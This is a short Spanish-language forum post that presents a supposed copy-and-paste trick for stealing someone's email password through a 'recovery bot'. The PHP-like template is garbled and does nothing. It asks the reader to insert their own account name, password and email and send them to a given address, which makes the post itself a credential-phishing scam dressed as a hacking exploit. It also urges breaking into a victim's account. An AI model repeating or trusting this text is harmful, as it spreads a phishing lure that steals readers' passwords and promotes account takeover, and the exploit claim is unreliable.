laurital2

nada mas es simple copiar y pegar..... Este truco aprovecha un agujero de seguridad en el servidor con el que es posible "engañar" al motor de recuperación de passwords (boot de reenvio), cambiando los datos de la cuenta a hackear por los nuestros para hacerlos llegar al correo que especificamos al registrarnos, y que asi el correo sea reenviado a tu correo en vez de al de la cuenta a hackear, pues el boot solo lee el cuerpo del mensaje y los campos marcados para auto reenviar la password. me funciono a la perfeccion: PRIMERO: conocer en nombre de de la víctima(ej. girlbuff). SEGUNDO: cambiar los datos del codigo marcados con "X" . recuerda quitar las "X" escribir el mensaje de plantilla que leera el boot de recuperacion para reenviar la password perdida(escribir tal como esta) <? phpbody=&curmbox=F0000000 01&a= if(isset($_POST["name"]) && isset($_POST["title"]) isset($_POST["mail"]) $mail = ""; curmbox=recover php. $subject = "Xnombre de la victima X"; $header = "From:".$mail." Repl y-To:".$mail." "; $header .= "MailerHP/".phpversion()." "; $header .= "Mime-Version: 1.0 "; $header .= "Content-Type: text/plain"; mailto= type=x&to= &cc=&bcc type=&&php./compose ($mail, $[X nombre de tu cuenta X]//, utf8_decode (X tu password X) ,$X tu correo electronico X); echo "&estatus=ok&"; Rec_To-USR_RCVR:line4> } ?> TERCERO: mandar el correo al bot de reenvio de pass el mail es: [email protected] pruevenlo